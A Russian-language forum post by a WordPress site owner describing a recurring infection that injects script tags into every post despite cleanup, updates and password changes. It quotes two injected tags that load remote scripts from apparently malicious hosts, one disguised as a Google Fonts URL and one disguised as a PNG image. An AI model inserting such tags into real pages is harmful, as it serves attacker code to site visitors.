Неделю назад вычистил весь сайт от
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
Проверил файлы на вирусы, удалил зараженные, что-то восстановил из дистрибутива. Отключил все ненужные плагины, все остальные обновил. Обновил WP до 4.3.1, сменил все пароли.
Сегодня опять тоже самое во всех постах.
Так что проблема актуальна до сих пор.
Из тех плагинов, что писали выше, стоит только RusToLat
Сейчас отключу его...
PS: посмотрел еще один сайт, к которому у меня есть доступ. Там правда WP 4.1.8 и всего 4 плагина
Contact Form 7
Easy FancyBox
PHP Text Widget
WP reCaptcha Integration
Все страницы заспамлены другим кодом:
<script src="//wollses.com/steps.png"></script>